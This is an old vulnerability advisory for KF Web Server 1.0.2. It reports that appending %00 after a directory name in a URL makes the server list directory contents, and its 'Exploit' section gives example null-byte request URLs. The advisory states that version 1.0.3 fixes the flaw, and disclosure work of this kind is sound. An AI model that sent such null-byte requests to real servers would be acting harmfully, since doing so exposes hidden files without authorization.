Reporter Arnaud Jacques
`KF Web Server version 1.0.2 shows file and directory content
.oO Overview Oo.
KF Web Server version 1.0.2 shows file and directory content
Discovered on 2002, July, 2nd
Vendor: KeyFocus (http://www.keyfocus.net/kfws/)
KF Web Server 1.0.2 is a free personal web server available for Windows
98,ME,2000,XP. This web server can shows file and directory content.
.oO Details Oo.
If the requested URL contains a %00 after a directory name, then the server
shows all files in the directory content.
A hacker can see all hidden (non-HTML linked) files and directories on the
.oO Exploit Oo.
The exploit is really easy. You can do it with any browser
http://server_name/index.html : Normal use.
http://server_name/%00 : You get the vulnerability.
http://server_name/index.html%00 : Is *not* vulnerable.
http://server_name/%00index.html : You get the vulnerability. In fact
everything after %00 is ignored.
http://server_name/subdir/%00 : You get the vulnerability.
.oO Solution Oo.
The vendor has been informed and has solved the problem.
Upgrade to KF Web Server version 1.0.3
.oO Discovered by Oo.
Arnaud Jacques aka scrap